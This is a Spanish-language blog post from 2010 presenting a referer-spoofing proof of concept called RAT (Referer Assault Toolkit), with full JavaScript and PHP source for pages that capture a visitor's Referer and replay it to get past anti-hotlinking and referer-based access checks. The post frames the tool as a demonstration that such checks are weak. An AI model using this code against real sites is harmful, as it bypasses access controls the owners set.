Los Caballeros
"Sobre seguridad, programación, modding, frikismo, etc... "

RAT (Referer Assault Toolkit)

en 10/29/2010 01:05:00 PM Twitter icon Twitter icon
RAT o Rata, es un proyecto que estamos desarrollando para demostrar como mediante javascript simple y/o un poco de PHP, y un poco de ingenio se puede spoofear básicamente cualquier referer, esto únicamente con la finalidad de demostrar la inseguridad que tienen los sistemas que utilizan esto para control de accesos. Como muchos sabrán los sistemas anti-leech monitorizan el Referer, de modo que si este no pertenece a determinado dominio, inmediatamente muestra la clásicamente imagen de que les están robando banda y la url de la web a la cual pertenece, de modo que esta técnica podría ser utilizada para saltar esa clase de protecciones, pero de momento solo mostraremos una prueba de concepto con una web programada para este fin.

Primero que nada una captura del inicio:


Después la pagina que enlaza de algún modo a nosotros (al dominio que si tenemos permisos con javascript):


Entramos a la web que nosotros si controlamos (dando clic al enlace) :


Como podrán ver Rata, ya capturo el Referer y nos lo muestra, ahora vamos a usarlo:


Como podrán ver nos marca que referer podemos usar, necesitamos escribir la url que se va a cargar con dicho Referer y dar clic en el referer a usar, ahora otra cosa que hay que remarcar es que la ventana que abrimos y que se encuentra actualmente mostrando el menaje de la Rata se utilizara para cargar la web con el Referer que indiquemos, así que esta no tiene que ser cerrada hasta finalizar.


Y listo, rata ha robado el Referer de http://192.168.1.79/vuln.html.

ahora me dirán: "ah que chido, pero el usuario tiene que dar clic...", bueno esta solo es una prueba de concepto, en si hay otro modulo de rata que permite insertarse como avatar y ser utilizado para robar el Referer, pero de momento únicamente publicare el modulo que les mostré, primero que nada el refhack.php:



<html><head><title>Rata By Xianur0 - Los Caballeros' blog</title><script language="JavaScript">var id = 1;window.onblur = function(){  setTimeout(actualizaratas, 500);}function lanzarrata(pagina) { var opciones=""; return window.open(pagina,"",opciones);}var ratas = new Array();function activarrata(rata,url) { setcookie('rata', 1); setcookie('nueva', url); rata.location.reload();}function setcookie(nombre, valor) {       document.cookie = nombre + "=" + escape(valor);  }  function actualizaratas() { var html = ''; var contador = 1; for (var rata in ratas) {  try {  var cookies = ratas[rata].document.cookie;  html += '<b>' + contador + '</b> <a href="#" onclick="activarrata(ratas[\'' + rata + '\'],document.getElementById(\'nuevaurl\').value)">' + rata + '\n<br>';  contador++;  } catch(err) {     } } var camporatas = document.getElementById('ratas'); if(html == '') html = 'Ninguna'; camporatas.innerHTML = html;}</script></head><body><center><h1>Rata by Xianur0 - Los Caballeros' blog</h1>Referer a robar: <input type="text" id='url'><input value = 'Iniciar' type="button" onclick="ratas[escape(document.getElementById('url').value)] = lanzarrata(document.getElementById('url').value);"><br /><br />URL a redirigir: <input type="text" id='nuevaurl'><input value = 'Establecer' type="button" onclick="setcookie('nueva',document.getElementById('nuevaurl').value);"><br /><br /><a href="#" onclick="actualizaratas();">Actualizar ratas</a><br /><b>Ratas disponibles: </b><div id='ratas'>Ninguna</div><br /><br /><br /></center><div align="right"><a href="http://hackingtelevision.blogspot.com/">Los Caballeros</a><br /></div></body></html>


Ahora el rata.php:

<?phpif($_COOKIE['rata'] == 1 && !empty($_COOKIE['nueva'])) { header("Location: ".$_COOKIE['nueva'],TRUE,302); header('Set-Cookie: rata = 0; nueva = ""');}else { print "<b>Rata te observa: ".htmlentities($_SERVER['HTTP_REFERER'])." :P</b>";}?>

Saludos!
El equipo Hacking Television
algunas ondas ,
Suscribirse a: Enviar comentarios (Atom)